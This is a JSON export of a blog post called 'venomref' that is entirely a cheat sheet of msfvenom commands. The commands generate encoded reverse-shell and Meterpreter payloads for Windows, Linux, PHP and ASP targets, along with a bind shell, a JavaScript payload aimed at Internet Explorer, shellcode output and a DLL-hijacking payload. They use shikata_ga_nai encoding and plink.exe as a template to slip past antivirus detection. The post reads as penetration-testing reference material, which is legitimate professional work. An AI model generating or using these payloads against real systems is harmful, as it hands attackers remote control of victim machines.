{"id":572,"date":"2023-07-08T15:07:28","date_gmt":"2023-07-08T15:07:28","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=572"},"modified":"2023-07-08T15:09:44","modified_gmt":"2023-07-08T15:09:44","slug":"venomref","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/venomref\/","title":{"rendered":"venomref"},"content":{"rendered":"\n<p><strong>.bashrc<\/strong><br>alias venomref='clear ; cat $HOME\/ref\/venomref'<\/p>\n\n\n\n<div class=\"wp-block-cover aligncenter\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><img loading=\"lazy\" decoding=\"async\" width=\"1456\" height=\"816\" class=\"wp-block-cover__image-background wp-image-573\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2023\/07\/venomref.png\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-center has-large-font-size\">venomref<\/p>\n<\/div><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>venomref (flat file):<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-medium-font-size\"><code>&#91;+ WINDOWS ENCODED PAYLOADS ] PORT 443\n====CHANGE. IP. AS. NEEDED.====\n\nWINDOWS\/SHELL\/REVERSE_TCP &#91;PORT 443]\nmsfvenom -p windows\/shell\/reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_86.exe\n\nWINDOWS\/SHELL_REVERSE_TCP (NETCAT x86) &#91;PORT 443]\nmsfvenom -p windows\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_86.exe\n\nWINDOWS\/SHELL_REVERSE_TCP (NETCAT x64) &#91;PORT 443]\nmsfvenom -p windows\/x64\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x64 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_86.exe\n\nWINDOWS\/METERPRETER\/REVRESE_TCP (x86) &#91;PORT 443] AT 10.0.0.67:\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_86.exe\n\nWINDOWS\/METERPRETER\/REVRESE_TCP (x64) &#91;PORT 443] AT 10.0.0.67:\nmsfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x64 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_64.exe\n\n\n---===BIND SHELL, ENCODED, ON PORT 1234===---\nmsfvenom -p windows\/shell_bind_tcp LHOST=10.0.0.67 LPORT=1234 --platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o bindshell_1234_encoded_86.exe\n\nCode for encoding:\n--platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o payload_86.exe\n\n================================================================================\n&#91;+ LINUX ]\nLINUX\/x86\/METERPRETER\/REVERSE_TCP\nmsfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=9997 -f elf >reverse.elf\n\nNETCAT\nmsfvenom -p linux\/x86\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=1234 -f elf >reverse.elf\n================================================================================\n\n&#91;+ PHP ]\nPHP\/METERPRETER_REVERSE_TCP &#91;PORT 443]\nmsfvenom -p php\/meterpreter_reverse_tcp LHOST=10.0.0.67 LPORT=443 -f raw > shell.php\ncat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\\n' > shell.php &amp;&amp; pbpaste >> shell.php\n\nPHP\/METERPRETER\/REVERSE_TCP &#91;PORT 443]\nmsfvenom -p php\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=443 -f raw > shell.php\ncat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\\n' > shell.php &amp;&amp; pbpaste >> shell.php\n\nPHP\/REVERSE_PHP &#91;PORT 443]\nmsfvenom -p php\/reverse_php LHOST=10.0.0.67 LPORT=443 -f raw > shell.php\ncat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\\n' > shell.php &amp;&amp; pbpaste >> shell.php\n================================================================================\n\n&#91;+ ASP]\nASP-REVERSE-PAYLOAD &#91;PORT 443]\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=443 -f asp > shell.asp\n\nOR FOR NETCAT &#91;PORT 443]\nmsfvenom -p windows\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=443 -f asp > shell.asp\n\n================================================================================\n&#91;+ Client-Side, Unicode Payload - For use with Internet Explorer and IE]\nmsfvenom -p windows\/shell_reverse_tcp LHOST=192.168.30.5 LPORT=443 -f js_le -e generic\/none\n\n#Note: To keep things the same size, if needed add NOPs at the end of the payload.\n#A Unicode NOP is - %u9090\n\n================================================================================\n===SHELLCODE GENERATION:\n================================================================================\n--===--\nmsfvenom -p windows\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=80 EXITFUNC=thread -f python -a x86 --platform windows -b '\\x00' -e x86\/shikata_ga_nai\n--===--\n================================================================================\n#DLL HiJacking - Windows - x64\nmsfvenom -a x64 -p windows\/x64\/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll\n================================================================================<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>.bashrcalias venomref='clear ; cat $HOME\/ref\/venomref' venomref (flat file):<\/p>\n","protected":false},"author":1,"featured_media":573,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[51,96,97,95,4,94],"class_list":["post-572","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-msf","tag-msfvenom","tag-payloads","tag-reverse-shell","tag-s1ren","tag-venomref"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=572"}],"version-history":[{"count":2,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/572\/revisions"}],"predecessor-version":[{"id":575,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/572\/revisions\/575"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/573"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=572"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}